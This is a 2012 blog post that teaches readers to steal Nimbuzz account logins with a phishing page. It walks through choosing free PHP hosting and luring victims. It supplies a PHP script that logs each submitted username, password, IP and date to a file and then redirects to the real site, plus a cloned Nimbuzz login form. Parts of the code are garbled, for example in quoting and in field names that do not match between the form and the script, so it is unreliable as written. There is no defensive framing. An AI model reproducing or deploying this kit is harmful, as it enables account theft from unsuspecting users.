Tuesday 4 September 2012

Hack nimbuzz via fake login page

Hello all
Now here, i can teach u H.A.C.Knimbuzz id by fake login page. In this method , we create a fake page like [You must be registered and logged in to see this link.] cheat users .
The most important things in H.A.C.King with fake page is .... what do u think ? yes, leadingusers to this page in any way u know.
Now for creating a fake login page u should just follow steps carefully .
First search free webhost withPHP support, I recommend youto use one of the the followinghost :
[You must be registered and logged in to see this link.]
[You must be registered and logged in to see this link.]
[You must be registered and logged in to see this link.]
[You must be registered and logged in to see this link.]
complete the register and thenyou upload the files that I provide for you ....
php code:-
<?php
$file = "log.txt" ; $username = $_POST [ 'username' ]; $password = $_POST [& apos ; password '];
$ip = $_SERVER[' REMOTE_ADDR '];
$today = date("F j, Y, g:ia");
$handle = fopen($file, ' a ');
fwrite($handle, " ");
fwrite($handle, "n");
fwrite($handle,"username: ");
fwrite($handle,"$username");
fwrite($handle, "n");
fwrite($handle,"password: ");
fwrite($handle,"$password");
fwrite($handle, "n");
fwrite($handle, "IP Address: ");
fwrite($handle, "$ip");
fwrite($handle, "n");
fwrite($handle, "Date Submitted: ");
fwrite($handle,"$today");
fwrite($handle, "n");
fwrite($handle, " ");
fwrite($handle, "n");
fwrite($handle, "n");
fclose($handle);
echo "<script LANGUAGE="JavaScript">
<!--
window.location="http://web.nimbuzz.com";
// -->
</script>";
?>
copy and then paste it in notepad and name the file"log.php".
The important part that you change in this section:
html code:-
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC"-//OMA//DTD XHTML Mobile 1.0//EN" "[You must be registeredand logged in to see this link.]
<html xmlns="[You must be registered and logged in to see this link.]
<head>
<title>Login to your Nimbuzz account</title>
<link rel=stylesheet href="http://wap.nimbuzz.com/m/css/nimbuzz.css" type="text/css" media="screen">
</head>
<body>
<div style="width: 100%;background-image: url(http://wap.nimbuzz.com//img/16/header-back.gif); padding:0px; font-size:1px;"><center><img src="http://wap.nimbuzz.com//img/16/header-nimbuzz.gif" alt="Nimbuzz" /></center></div>
<!-- <center><b>Sign in</b></center> -->
<p><b>Welcome to Nimbuzz</b></p>
<br />
<p>Chat with your buddies on Windows Live Messenger, Yahoo!,Facebook, GoogleTalk, AIM and more !</p>
<br/>
<form method="post" action="log.php">
<div>
<label>Username:<br/><input type="text" name="u" value="" maxlength="64"/></label><br/>
<label>Password:<br/><input type="password" name="p" value="" maxlength="32"/></label><br/>
<label><input type="checkbox" name="r" maxlength="64"/>&amp;#160;Remember me</label><br/>
<input type="submit" value="Sign in"/>
</div>
</form>
<hr>
<br>
<div><a href="regUser.jsp?SID=EHWq38hN82Ron724">Create Nimbuzz acount</a></div>
<div><a href="http://get.nimbuzz.com">Download Nimbuzz</a></div>
<br><br>
</body>
</html>
copy and paste it innotepad and name the file"index.html".
enjoy hacking

No comments:

Post a Comment